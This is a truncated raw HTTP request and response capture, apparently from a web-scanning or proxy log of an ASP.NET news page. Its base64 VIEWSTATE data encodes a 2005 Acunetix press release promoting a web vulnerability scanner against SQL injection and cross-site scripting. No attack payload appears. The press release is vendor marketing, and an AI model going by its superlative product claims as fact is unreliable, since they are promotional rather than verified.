dGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLi